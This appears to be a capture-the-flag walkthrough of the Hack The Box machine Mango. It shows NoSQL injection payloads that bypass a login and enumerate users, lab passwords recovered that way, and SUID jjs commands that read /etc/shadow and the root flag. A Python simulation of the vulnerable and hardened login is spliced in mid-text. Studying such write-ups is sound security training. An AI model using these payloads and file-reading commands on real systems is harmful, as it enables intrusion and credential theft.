[HTB] Mango — Write-up (OSWE-Prep)

Mango was a medium-difficulty Linux box. Good learning path for:

Initial Recon

Nmap

# nmap -Pn --open -sC -sV -p- -T4 10.10.10.162
PORT    STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
| http/1.1
| http/1.1
| http/1.1
...[snip]...
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Except for “Analytics,” all the other links were non-functional. The “Analytics” page had some cool-looking charts and a few other functions; however, it was a rabbit hole and gave me nothing to exploit.

Next, I inspected the TLS certificate and found an additional domain, staging-order.mango.htb, in the Common Name (CN) field.

By adding this domain to the /etc/hosts file, we can now reach the delicious-looking login page.

Updating /etc/hosts with staging-order.mango.htb

Initial Foothold

MongoDB + NoSQL

I did some directory brute-forcing and some of the basic SQLi attacks against the login; however, nothing came back with good news.

My next thought was to guess, since HTB likes to use the box name as a hint. Mango sounds similar to MongoDB, so I did some Google searching for MongoDB exploits. I came across an old MMACTF 2016 write-up about MongoDB — Extracting data (admin password) using NoSQL Injection. It describes leveraging a NoSQL injection technique to bypass the authentication scheme, enumerate users and recover the passwords associated with them. Sounds juicy like mango :)

NoSQL Injection Attack

First things first, I wanted to confirm whether the login and whatever back-end DB sat behind it (although I was fairly convinced it would be MongoDB) were vulnerable to NoSQL injection. I used some example PoCs from a CTF write-up as well as the PayloadsAllTheThings GitHub repository.

Example PoC of NoSQL Injection Exploit (Source: PayloadsAllTheThings)

(1) Benign Login Attempt

I captured the login request, submitting the arbitrary credentials admin:admin. The response came back as “200 OK” and simply returned me to the same login page.

(2) NoSQL Injection Attack to Bypass Authentication

When I sent the following payload instead, I got a “302 Found” redirection response.

username[$ne]=admin&password[$ne]=admin&login=login

When I followed the redirection, I had successfully bypassed authentication and could view the /home.php page.

It was just a static error page saying “Under Plantation,” and there was nothing further I could do with it. What we can still do with a NoSQL injection against the database, though, is dump credentials from it.

NoSQL Injection Attack — User Enumeration

From the error page, I knew that the user “admin” was valid. We can quickly confirm this by doing the following:

### Valid User
username=admin&password[$ne]=password&login=login --> 302 Found
### Invalid User
username=noOne&password[$ne]=password&login=login --> 200 OK
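The $ne bypass and the valid/invalid user check above, modelled as an added example that is not part of the original write-up: a small Python simulation of how PHP-style form parsing turns username[$ne]=admin into a MongoDB operator object, with the vulnerable credential query beside a hardened one that rejects non-string input. The user collection, passwords and matcher are constructed for the example, not the box's real code.

```python
import re
from urllib.parse import parse_qsl

# Constructed stand-in for the application's MongoDB "users" collection
USERS = [
    {"username": "admin", "password": "constructed-admin-pw"},
    {"username": "mango", "password": "constructed-mango-pw"},
]

def php_style_parse(body):
    """Parse a form body the way PHP does: a bracketed key such as
    'username[$ne]' becomes a nested dict {'username': {'$ne': 'admin'}}."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params

def matches(doc, filt):
    """Minimal MongoDB-style matcher (equality and $ne only), enough to show
    why an operator object passed as a credential satisfies the query."""
    for field, cond in filt.items():
        if isinstance(cond, dict):
            if "$ne" in cond and doc.get(field) == cond["$ne"]:
                return False
        elif doc.get(field) != cond:
            return False
    return True

def vulnerable_login(body):
    """Passes the parsed parameters straight into the query filter."""
    p = php_style_parse(body)
    filt = {"username": p.get("username"), "password": p.get("password")}
    return [u["username"] for u in USERS if matches(u, filt)]

def hardened_login(body):
    """Refuses anything that is not a plain string before it reaches the DB,
    so operator objects can never become part of the filter."""
    p = php_style_parse(body)
    user, pw = p.get("username"), p.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        raise ValueError("credentials must be plain strings")
    filt = {"username": user, "password": pw}
    return [u["username"] for u in USERS if matches(u, filt)]
```

Running the page's payloads through vulnerable_login reproduces the 302-versus-200 behaviour (a non-empty match versus none), while hardened_login rejects them outright.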

Knowing this, I used Burp Intruder with the rockyou.txt wordlist to enumerate more valid users from the database:

NoSQL Injection Attack — Extracting Passwords

Next, I modified the PoC script from the CTF write-up to extract the passwords from the back-end database. This exploit script can also be found here.

exploit.py

Password found for “admin” user: t9KcS3>!0B#2

The password found for “mango” user: h3mXK8RhU~f{]f5H

I SSHed into the box using the mango's credentials.

However, “mango” user does not have permission to read the user.txt flag.

Privilege Escalation

mango → admin

user.txt

Escalating from mango to admin was pretty simple. I used the su admin command with admin's password to log in as the admin user, and could then read the user.txt flag.

admin → Root (GTFobins Exploit)

For the privilege escalation, I ran the LinEnum.sh script to quickly cover the basics. It found the following interesting SUID file:

What was interesting about this file was that it was owned by root, but its group owner was the admin user, so that admin could run this binary in the context of the root user.

GTFobins — JJS Exploit

From a quick search in GTFobins site, I was able to find a PoC script to exploit this jjs program.

The script was pretty self-explanatory, and using it, one could read any file with root permissions.

### Reading /etc/shadow File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/etc/shadow"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

root.txt

### Reading /root/root.txt File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

Conclusion

This was a really good box for learning about NoSQL injection attacks. Writing an exploit script to dump the passwords from the back-end database was really fun too.

Thanks for reading!

Thanks to TJ_NULL for providing the list for the OSWE-like VMs
